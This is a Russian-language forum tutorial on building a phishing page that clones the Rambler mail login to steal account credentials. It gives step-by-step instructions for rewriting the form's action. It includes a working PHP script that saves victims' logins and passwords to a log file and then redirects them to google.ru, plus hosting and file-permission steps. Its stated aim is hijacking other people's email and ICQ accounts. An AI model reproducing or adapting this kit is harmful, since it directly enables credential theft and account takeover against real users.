автор: brasco2k

Последнее время, самым простым способом угона мыла\icq\аккаунта на каком-нибудь сервере стал фейк.

Фейк(с англ. ложный) - это ложная страница, при заходе на которую юзер вводит свои данные авторизации, которые попадают в руки мошеннику.

Изготовление

Давайте рассмотрим фейк на примере рамблера.

1. Открываем rambler в браузере OPERA .

Открыли?! Чего ждем сохраняем!
ФАЙЛ -> Сохранить как -> Html файл с рисунками. И называем index.html.

2. Открываем смотрим как сохранилась. Если без проблем - идем далее, иначе смотрим ошибки.

Открываем index.htm в блокноте или Notepad++(что наиболее удобно) . Ищем строчку

PHP код:
<form action="http://mail.rambler.ru/script/auth.cgi" method="POST">

В параметре action мы должны заменить адресс скрипта авторизации(это адресс, куда клиент перенаправляется после нажатия кнопки войти).

Получится:

PHP код:
<form action="redirect.php" method="POST">

ищем поля ввода логина и пароля:

PHP код:
<input type="text" name="login" value="" size="10" tabindex="2" class="input100">
<input type="password" name="passw" size="10" tabindex="2" class="input100">

Здесь нужно обратить внимание на имена ПОЛЕЙ
Это name='login';
И name='passw';

3. redirect.php:

PHP код:
<?php
$f=fopen("pass.log","at");
flock($f,2);
fputs($f,"Логин: ".$_POST['login']."\n");
fputs($f,"Пароль ".$_POST['passw']."\n"."---------------\n");
flock($f,3);
fclose($f);
?>
<script>
document.location.href="http://google.ru";
</script>

$_POST['login']
$_POST['passw'] - это поля которое мы будем сохранять.

т.е что у нас в файле index.htm (имена) мы их сюда вписываем.
pass.log - файл куда будемсохранять пароли.

PHP код:
<script> document.location.href="http://google.ru"; </script>
-google.ru это адресс куды перенаправят юзера после сохранения пароля.

5. Осталось залить на хостинг с php и выставить права(chmod) на файлы:

redirect.php - 755
pass.log - 777/

Спасибо за внимание.

+ Небольшой мануал

hxxp://webfile.ru/1980805